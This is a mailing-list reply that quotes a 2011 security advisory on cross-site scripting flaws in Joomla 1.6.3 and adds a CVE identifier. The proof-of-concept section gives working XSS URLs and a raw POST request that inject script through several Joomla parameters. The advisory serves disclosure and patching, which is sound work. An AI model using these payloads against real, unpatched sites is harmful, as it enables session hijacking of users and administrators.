On Tue, Jun 28, 2011 at 02:25:07PM +0800, YGN Ethical Hacker Group wrote: > Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities > > > > 1. OVERVIEW > > Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting > issues. > > > 2. BACKGROUND > > Joomla is a free and open source content management system (CMS) for > publishing content on the World Wide Web and intranets. It comprises a > model–view–controller (MVC) Web application framework that can also be > used independently. > Joomla is written in PHP, uses object-oriented programming (OOP) > techniques and software design patterns, stores data in a MySQL > database, and includes features such as page caching, RSS feeds, > printable versions of pages, news flashes, blogs, polls, search, and > support for language internationalization. > > > 3. VULNERABILITY DESCRIPTION > > Several parameters (QueryString, option, searchword) in Joomla! Core > components (com_content, com_contact, com_newsfeeds, com_search) are > not properly sanitized upon submission to the /index.php url, which > allows attacker to conduct Cross Site Scripting attack. This may allow > an attacker to create a specially crafted URL that would execute > arbitrary script code in a victim's browser. > > > 4. VERSION AFFECTED > > 1.6.3 and lower > > > 5. PROOF-OF-CONCEPT/EXPLOIT > > > component: com_contact , parameter: QueryString (Browser: All) > =============================================================== > > http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";><script>alert(/XSS/)</script> > > > component:com_content , parameter: QueryString (Browser: All) > =============================================================== > > http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script> > > > component: com_newsfeeds , parameter: QueryString (Browser: All) > ================================================================= > > http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering > > > parameter: option (Browser: All) > ==================================== > > http://attacker.in/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request > > > component: com_search, parameter: searchword (Browser: IE, Konqueror) > ===================================================================== > > [REQUEST] > POST /joomla163/index.php HTTP/1.1 > Referer: http://attacker.in/joomla163/ > User-Agent: Konqueror/4.5 > Cache-Control: no-cache > Content-Type: application/x-www-form-urlencoded > Host: attacker.in > Accept-Encoding: gzip, deflate > Content-Length: 125 > > option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search > [/REQUEST] > > This searchword XSS was identified via source code: > http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg > > > 6. IMPACT > > Attackers can compromise currently logged-in user/administrator > session and impersonate arbitrary user actions available under > /administrator/ functions. > > > 7. SOLUTION > > Upgrade to Joomla! 1.6.4 or higher > > > 8. VENDOR > > Joomla! Developer Team > http://www.joomla.org > > > 9. CREDIT > > This vulnerability was discovered by Aung Khant, http://yehg.net, YGN > Ethical Hacker Group, Myanmar. > > > 10. DISCLOSURE TIME-LINE > > 2011-05-26: notified vendor > 2011-06-28: vendor released fix > 2011-06-28: vulnerability disclosed > > > 11. REFERENCES > > Original Advisory URL: > http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) > Vendor Advisory URL: > http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html > XSS FAQ: http://www.cgisecurity.com/xss-faq.html > OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project > CWE-79: http://cwe.mitre.org/data/definitions/79.html > > > #yehg [2011-06-28]
CVE-2011-2509 can be used for this issue. Could Joomla-people update http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html advisory, thank you? References: http://seclists.org/oss-sec/2011/q2/730 Best regards, Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
